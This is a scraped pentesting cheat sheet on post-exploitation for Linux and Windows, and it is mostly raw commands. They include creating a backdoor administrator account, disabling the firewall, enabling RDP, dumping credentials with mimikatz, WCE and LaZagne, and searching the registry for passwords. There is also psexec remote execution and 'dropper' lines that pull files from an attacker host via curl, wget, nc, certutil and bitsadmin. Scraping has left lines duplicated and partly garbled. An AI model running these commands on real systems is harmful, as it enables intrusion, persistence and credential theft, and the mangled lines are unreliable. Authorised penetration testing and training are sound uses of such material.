created: 2022-04-19T19:48:56 (UTC +08:00)
tags: []
source: https://pentestwiki.org/post-exploitation/
author:

✅ Intro to Post Exploitation - pentestwiki.org

Excerpt

Learn about post exploitation tactics in Windows and Linux, how to exfiltrate information, information gathering, password dumping, …

  • Check wrong permissions:

Intro to Post Exploitation - 图1

Find setuid binaries:

find / -perm -4000 -ls 2> /dev/null

find / -perm -4000 -ls 2> /dev/null

  1. find / -perm -4000 -ls 2> /dev/null

Find files world writable:

find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null

find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null

  1. find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null

Find directories world writable:

find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null

find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null

  1. find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null

Look for interesting files:

find / -name “*.txt” -ls 2> /dev/null

find / -name “*.log” -ls 2> /dev/null

find / -name “.txt” -ls 2> /dev/null find / -name “.log” -ls 2> /dev/null

  1. find / -name "*.txt" -ls 2> /dev/null
  2. find / -name "*.log" -ls 2> /dev/null

Check sudo:

  1. sudo su
  2. sudo -l

Decrypt PKCS#12 objects:

openssl pkcs12 -info -in $FILE

openssl pkcs12 -info -in $FILE

  1. openssl pkcs12 -info -in $FILE

Show certs in PKCS#7 file:

openssl pkcs7 -print_certs -inform DER -in $FILE

openssl smime -verify -in signed.p7 -inform pem

openssl smime -verify -in signed.p7 -inform der

openssl pkcs7 -print_certs -inform DER -in $FILE openssl smime -verify -in signed.p7 -inform pem openssl smime -verify -in signed.p7 -inform der

  1. openssl pkcs7 -print_certs -inform DER -in $FILE
  2. openssl smime -verify -in signed.p7 -inform pem
  3. openssl smime -verify -in signed.p7 -inform der

Show keystore content:

keytool -list -v -keystore keystore.jks

keytool -list -v -keystore keystore.jks

  1. keytool -list -v -keystore keystore.jks
  • Commands for information gathering:
  1. ps -ef
  1. mount
  1. /sbin/ifconfig -a
  1. route -n

cat /etc/crontab ls -la /var/spool/cron*/ ls -la /etc/cron.d

  1. cat /etc/crontab
  2. ls -la /var/spool/cron*/
  3. ls -la /etc/cron.d
  1. cat /etc/exports

cat /etc/redhat /etc/debian /etc/*release

cat /etc/redhat /etc/debian /etc/*release

  1. cat /etc/redhat* /etc/debian* /etc/*release
  1. netstat -tanu

Find users with shell access:

egrep -e ‘/bin/(ba)?sh’ /etc/passwd

egrep -e ‘/bin/(ba)?sh’ /etc/passwd

  1. egrep -e '/bin/(ba)?sh' /etc/passwd

Check bootup services:

  1. ls /etc/rc*

SSH relationships and logins:

  1. cat ~/.ssh/*

References:

Tools:

Windows Post-exploitation

Check filesystem:

Like “ls -la” in Linux:

  1. dir /A:H

dir /s /b C:\ | findstr /E “.txt” > txt.txt

dir /s /b C:\ | findstr /E “.log” > log.txt

dir /s /b C:\ | findstr /E “.doc” > doc.txt

dir /s /b C:\ | findstr /E “.xls” > xls.txt

dir /s /b C:\ | findstr /E “.xml” > xml.txt

dir /s /b C:\ | findstr /E “.txt” > txt.txt dir /s /b C:\ | findstr /E “.log” > log.txt dir /s /b C:\ | findstr /E “.doc” > doc.txt dir /s /b C:\ | findstr /E “.xls” > xls.txt dir /s /b C:\ | findstr /E “.xml” > xml.txt

  1. dir /s /b C:\ | findstr /E ".txt" > txt.txt
  2. dir /s /b C:\ | findstr /E ".log" > log.txt
  3. dir /s /b C:\ | findstr /E ".doc" > doc.txt
  4. dir /s /b C:\ | findstr /E ".xls" > xls.txt
  5. dir /s /b C:\ | findstr /E ".xml" > xml.txt

Compute MD5 hash:

Get-FileHash -Algorithm MD5 -Path .\$FILE

Get-FileHash -Algorithm MD5 -Path .\$FILE

  1. Get-FileHash -Algorithm MD5 -Path .\$FILE

Check registry:

reg query HKLM /f password /t REG_SZ /s > hklm_password.txt

reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt

reg query HKLM /f password /t REG_SZ /s > hklm_password.txt reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt

  1. reg query HKLM /f password /t REG_SZ /s > hklm_password.txt
  2. reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt
  3. reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt
  4. reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt

Check scheduler:

schtasks /query /fo LIST /v > schtasks.txt

tasklist /SVC > tasklist.txt

schtasks /query /fo LIST /v > schtasks.txt tasklist /SVC > tasklist.txt

  1. schtasks /query /fo LIST /v > schtasks.txt
  2. tasklist /SVC > tasklist.txt

Other checks:

wmic os where Primary=’TRUE’ reboot

DRIVERQUERY wmic os where Primary=’TRUE’ reboot

  1. DRIVERQUERY
  2. wmic os where Primary='TRUE' reboot

List hotfixes:

  1. wmic qfe

notepad myfile.txt:lion.txt

netstat -an > netstat.txt

netsh firewall show config > firewall.txt

type C:\Windows\System32\drivers\etc\hosts

notepad myfile.txt:lion.txt eventvwr.exe quser > rdp.txt netstat -an > netstat.txt netsh firewall show config > firewall.txt icacls service.exe type C:\Windows\System32\drivers\etc\hosts

  1. notepad myfile.txt:lion.txt
  2. eventvwr.exe
  3. quser > rdp.txt
  4. netstat -an > netstat.txt
  5. netsh firewall show config > firewall.txt
  6. icacls service.exe
  7. type C:\Windows\System32\drivers\etc\hosts

Wmic commands:

wmic service get name,displayname,pathname,startmode > wmic_service.txt

wmic /node:’’ qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect

wmic /node:”” product get name,version,vendor

wmic process get Caption,CommandLine

wmic service get name,displayname,pathname,startmode > wmic_service.txt wmic /node:’’ qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect wmic /node:”” product get name,version,vendor wmic process get Caption,CommandLine wmic printer list status wmic cpu get

  1. wmic service get name,displayname,pathname,startmode > wmic_service.txt
  2. wmic /node:'' qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect
  3. wmic /node:"" product get name,version,vendor
  4. wmic process get Caption,CommandLine
  5. wmic printer list status
  6. wmic cpu get

List SIDs of the system (as admin):

wmic useraccount get name,sid,fullname

wmic useraccount get name,sid,fullname

  1. wmic useraccount get name,sid,fullname

Net commands:

net view net view \host net share net use z: \host\dir net users net user %username% net config rdr

  1. net view
  2. net view \\host
  3. net share
  4. net use z: \\host\dir
  5. net users
  6. net user %username%
  7. net config rdr

Backdoor account:

net user hax0r hax0r /add

net localgroup administrators hax0r /add

net localgroup “Remote Desktop users” hax0r /add

net user hax0r hax0r /add net localgroup administrators hax0r /add net localgroup “Remote Desktop users” hax0r /add

  1. net user hax0r hax0r /add
  2. net localgroup administrators hax0r /add
  3. net localgroup "Remote Desktop users" hax0r /add

Check routing/network information:

route print arp -A ipconfig /all getmac

  1. route print
  2. arp -A
  3. ipconfig /all
  4. getmac

Show files attributes / permissions

cacls cmd.exe attrib cmd.exe

  1. cacls cmd.exe
  2. attrib cmd.exe

List services:

sc queryex type=service state=all

sc queryex type=service state=all net start

  1. sc queryex type=service state=all
  2. net start

Other info:

  1. systeminfo
  2. whoami

Idem for Win XP:

  1. echo %USERNAME%
  • Firewall

netsh firewall show config

netsh advfirewall firewall add rule name=”httptunnel_client” dir=in action=allow program=”httptunnel_client.exe” enable=yes

netsh advfirewall firewall add rule name=”3000” dir=in action=allow protocol=TCP localport=3000

netsh advfirewall firewall add rule name=”1080” dir=in action=allow protocol=TCP localport=1080

netsh advfirewall firewall add rule name=”1079” dir=in action=allow protocol=TCP localport=1079

netsh firewall show stat netsh firewall show config netsh advfirewall firewall add rule name=”httptunnel_client” dir=in action=allow program=”httptunnel_client.exe” enable=yes netsh advfirewall firewall add rule name=”3000” dir=in action=allow protocol=TCP localport=3000 netsh advfirewall firewall add rule name=”1080” dir=in action=allow protocol=TCP localport=1080 netsh advfirewall firewall add rule name=”1079” dir=in action=allow protocol=TCP localport=1079

  1. netsh firewall show stat
  2. netsh firewall show config
  3. netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
  4. netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
  5. netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
  6. netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079

Disable firewall:

netsh advfirewall set currentprofile state off

netsh advfirewall set currentprofile state off

  1. netsh advfirewall set currentprofile state off

netsh advfirewall set allprofiles state off

netsh advfirewall set allprofiles state off

  1. netsh advfirewall set allprofiles state off
  • RDP

Show RDP sessions:

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer” /v fDenyTSConnections /t REG_DWORD /d 0 /f

reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0

netsh firewall set service type=remotedesktop mode=enable

net start “Terminal Services”

tasklist /svc /S servername/U username /P password

quser qwinsta reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer” /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 netsh firewall set service type=remotedesktop mode=enable net start termservice net start “Terminal Services” svchost.exe -k termsvcs tasklist /svc /S servername/U username /P password

  1. quser
  2. qwinsta
  3. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  4. reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
  5. netsh firewall set service type=remotedesktop mode=enable
  6. net start termservice
  7. net start "Terminal Services"
  8. svchost.exe -k termsvcs
  9. tasklist /svc /S servername/U username /P password

Change RDP daemon status from Meterpreter (more Meterpreter commands in Metasploit Meterpreter Cheat Sheet)

msf> reg queryval -k “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” -v TSEnabled

msf> reg setval -k “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” -v TSEnabled -d 1

msf> reg queryval -k “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” -v TSEnabled msf> reg setval -k “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” -v TSEnabled -d 1

  1. msf> reg queryval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled
  2. msf> reg setval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled -d 1

Change RDP port:

  1. \HKLM\System\CurrentControlSet\Control\Terminal Server\WinStationRDP-TCP Value : PortNUmber REG_DWORD=3389

Remote Execution commands:

wmis -U DOMAIN!PASS //$DC cmd.exe /c $COMMAND

wmic /node:Intro to Post Exploitation - 图2PASSWORD bios get serialnumber

tasklist.exe /S $IP /U domain\username

tasklist.exe /S $IP /U domain\username /FI “USERNAME eq NT AUTHORITY\SYSTEM” /FI “STATUS eq running”

taskkill.exe /S $IP /U domain\username /F /FI “norton”

wmis -U DOMAIN!PASS //$DC cmd.exe /c Intro to Post Exploitation - 图3IP /user:administrator /password:$PASSWORD bios get serialnumber tasklist.exe /S $IP /U domain\username tasklist.exe /S $IP /U domain\username /FI “USERNAME eq NT AUTHORITY\SYSTEM” /FI “STATUS eq running” taskkill.exe /S Intro to Post Exploitation - 图4IP

  1. wmis -U DOMAIN\$USER%$PASS //$DC cmd.exe /c $COMMAND
  2. wmic /node:$IP /user:administrator /password:$PASSWORD bios get serialnumber
  3. tasklist.exe /S $IP /U domain\username
  4. tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"
  5. taskkill.exe /S $IP /U domain\username /F /FI "norton"
  6. quser /SERVER:$IP

From sysinternals psexec:

psexec -accepteula \$IP -u DOMAIN\USER cmd.exe

psexec \$IP -s cmd /c copy \server\share\file.ext c:\Temp

psexec -s \$IP c:\windows\system32\cscript.exe script.vbs arg1

psexec -accepteula \Intro to Post Exploitation - 图5IP -s cmd /c copy \server\share\file.ext c:\Temp psexec -s \$IP c:\windows\system32\cscript.exe script.vbs arg1

  1. psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe
  2. psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp
  3. psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1

Copy a file to the target host AND execute it:

psexec -accepteula \$IP -u DOMAIN\USER -c file.exe -w C:\temp

psexec -accepteula \$IP -u DOMAIN\USER -c file.exe -w C:\temp

  1. psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp

Authenticated WMI Exec via Powershell

msf > use exploit/windows/local/ps_wmi_exec

msf exploit(windows/local/ps_wmi_exec) > show options

Module options (exploit/windows/local/ps_wmi_exec):

Name Current Setting Required Description

DOMAIN no Domain or machine name

PASSWORD no Password to authenticate with

RHOSTS no Target address range or CIDR identifier

SESSION yes The session to run this module on.

USERNAME no Username to authenticate as

msf exploit(windows/local/ps_wmi_exec) >

msf > use exploit/windows/local/ps_wmi_exec msf exploit(windows/local/ps_wmi_exec) > show options Module options (exploit/windows/local/ps_wmi_exec): Name Current Setting Required Description —— ———————- ———— —————- DOMAIN no Domain or machine name PASSWORD no Password to authenticate with RHOSTS no Target address range or CIDR identifier SESSION yes The session to run this module on. USERNAME no Username to authenticate as Exploit target: Id Name — —— 0 Universal msf exploit(windows/local/ps_wmi_exec) >

  1. msf > use exploit/windows/local/ps_wmi_exec
  2. msf exploit(windows/local/ps_wmi_exec) > show options
  4. Module options (exploit/windows/local/ps_wmi_exec):
  6.    Name      Current Setting  Required  Description
  7.    ----      ---------------  --------  -----------
  8.    DOMAIN                     no        Domain or machine name
  9.    PASSWORD                   no        Password to authenticate with
  10.    RHOSTS                     no        Target address range or CIDR identifier
  11.    SESSION                    yes       The session to run this module on.
  12.    USERNAME                   no        Username to authenticate as
  15. Exploit target:
  17.    Id  Name
  18.    --  ----
  19.    0   Universal
  22. msf exploit(windows/local/ps_wmi_exec) >

In the same host but with other role:

runas /user:administrator cmd

runas /noprofile /user:DOMAIN\administrator cmd

runas /profile /env /user:DOMAIN\$USER “%windir%\system32\script.bat”

runas /user:administrator cmd runas /noprofile /user:DOMAIN\administrator cmd runas /profile /env /user:DOMAIN\$USER “%windir%\system32\script.bat”

  1. runas /user:administrator cmd
  2. runas /noprofile /user:DOMAIN\administrator cmd
  3. runas /profile /env /user:DOMAIN\$USER "%windir%\system32\script.bat"

Windows exploit suggester (OBSOLETE)

WARNING: As of March 14 2017 no longer supported (https://github.com/GDSSecurity/Windows-Exploit-Suggester/issues/28)

python windows-exploit-suggester.py —update

python windows-exploit-suggester.py —database 2014-06-06-mssb.xlsx —systeminfo win7sp1-systeminfo.txt

python windows-exploit-suggester.py —update python windows-exploit-suggester.py —database 2014-06-06-mssb.xlsx —systeminfo win7sp1-systeminfo.txt

  1. python windows-exploit-suggester.py --update
  2. python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

Tools for information gathering

Manual method

dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent

dir %USERPROFILE%\Favorites

type C:\Windows\System32\drivers\etc\hosts

dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent dir %USERPROFILE%\Favorites type C:\Windows\System32\drivers\etc\hosts

  1. dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
  2. dir %USERPROFILE%\Favorites
  3. type C:\Windows\System32\drivers\etc\hosts

LaZagne

Download LaZagne from https://github.com/AlessandroZ/LaZagne

laZagne.exe browsers -firefox

laZagne.exe all laZagne.exe browsers laZagne.exe browsers -firefox

  1. laZagne.exe all
  2. laZagne.exe browsers
  3. laZagne.exe browsers -firefox
  • Pupy https://github.com/n1nj4sec/pupy: opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python

Sniffers

Sniffers for Windows

Install Wireshark, also use in console dumpcap:

dumpcap -D dumpcap -i $IFACE

  1. dumpcap -D
  2. dumpcap -i $IFACE

Keyloggers for Windows

Windows keylogger (no admin rights):

To cross-compile it for Windows:

i686-w64-mingw32-g++ klog_main.cpp -o klog -static

i686-w64-mingw32-g++ klog_main.cpp -o klog -static

  1. i686-w64-mingw32-g++ klog_main.cpp -o klog -static

Network sniffers for Linux

tcpdump -X -s 0 -i $INTERFACE

tcpdump -X -s 0 -i $INTERFACE

  1. tcpdump -X -s 0 -i $INTERFACE

Password dumping

mimikatz

mimikatz> privilege::debug

mimikatz> sekurlsa::logonPasswords

mimikatz.exe mimikatz> privilege::debug mimikatz> sekurlsa::logonPasswords mimikatz> sekurlsa::msv

  1. mimikatz.exe
  2. mimikatz> privilege::debug
  3. mimikatz> sekurlsa::logonPasswords
  4. mimikatz> sekurlsa::msv

Fgdump

Dumps hashes (needs SYSTEM privileges)

  1. fgdump.exe

WCE (Windows Credential Editor)

Dumps clear passwords:

  1. wce -w

Dumps hashes:

  1. wce

Persistent, writes in credentials.txt:

  1. wce -r

Change your credentials in memory:

  1. wce -s

Droppers

Droppers are programs that allows you to download tools, trojans, etc to the target machine to follow the compromise locally.

Droppers using Linux

curl -k https://$IP/file > file

wget http://![](https://g.yuque.com/gr/latex?IP%2Ffile%20curl%20-k%20https%3A%2F%2F#card=math&code=IP%2Ffile%20curl%20-k%20https%3A%2F%2F&id=A00sZ)IP/file > file nc -nvv $IP 8080 > file scp Intro to Post Exploitation - 图6IP:~

  1. wget http://$IP/file
  2. curl -k https://$IP/file > file
  3. nc -nvv $IP 8080 > file
  4. scp $FILE root@$IP:~

Droppers using Windows

Powershell

  1. curl -Uri $URL

See also Powercat in the Powershell frameworks section.

ROBOCOPY

NET USE \Intro to Post Exploitation - 图7 /USER:DOMAIN\USER

ROBOCOPY \$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z

NET USE \Intro to Post Exploitation - 图8 /USER:DOMAIN\USER ROBOCOPY \Intro to Post Exploitation - 图9IP\IPC$ /D

  1. NET USE \\$IP\IPC$ /USER:DOMAIN\USER
  2. ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z
  3. NET USE \\$IP\IPC$ /D

BITSAdmin

https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool

Direct Transfer:

bitsadmin /transfer myDownloadJob /download /priority normal http://![](https://g.yuque.com/gr/latex?IP%2F#card=math&code=IP%2F&id=TTN3K)FILE c:\$FILE

bitsadmin /transfer myDownloadJob /download /priority normal http://![](https://g.yuque.com/gr/latex?IP%2F#card=math&code=IP%2F&id=dF0KV)FILE c:\$FILE

  1. bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE

Using a download queue:

bitsadmin /create myDownloadJob

bitsadmin /addfile myDownloadJob http://![](https://g.yuque.com/gr/latex?IP%2F#card=math&code=IP%2F&id=c3Gpm)FILE c:\$FILE

bitsadmin /create myDownloadJob bitsadmin /addfile myDownloadJob http://![](https://g.yuque.com/gr/latex?IP%2F#card=math&code=IP%2F&id=jNy3l)FILE c:\$FILE

  1. bitsadmin /create myDownloadJob
  2. bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE

Certutil

certutil.exe -urlcache -split -f “https://$IP/files/netcat.exe“ nc.exe

certutil.exe -urlcache -split -f “https://$IP/files/netcat.exe“ nc.exe

  1. certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe

Notepad

notepad.exe http://$IP/file.txt

notepad.exe http://$IP/file.txt

  1. notepad.exe http://$IP/file.txt

Living Off the Land (LOLbins) for Windows

Links:

Examples:

hh.exe C:\windows\system32\calc.exe

hh.exe C:\windows\system32\calc.exe

  1. hh.exe C:\windows\system32\calc.exe

C# compiler built-in command:

  1. csc.exe

Droppers Using known protocols

HTTP

Python2

python -m SimpleHTTPServer

python -m SimpleHTTPServer

  1. python -m SimpleHTTPServer

python -m SimpleHTTPServer 80

python -m SimpleHTTPServer 80

  1. python -m SimpleHTTPServer 80

Python3

python3 -m http.server 8080

python3 -m http.server 8080

  1. python3 -m http.server 8080

Php

  1. php -S localhost:8000

Ruby

ruby -run -e httpd . -p 8000

ruby -run -e httpd . -p 8000

  1. ruby -run -e httpd . -p 8000

FTP

pip install pyftpdlib python -m pyftpdlib

  1. pip install pyftpdlib
  2. python -m pyftpdlib

SMB

impacket-smbserver PAYLOADS /root/payload

impacket-smbserver PAYLOADS /root/payload

  1. impacket-smbserver PAYLOADS /root/payload

As part of the post-exploitation part we can also perform Data Exfiltration.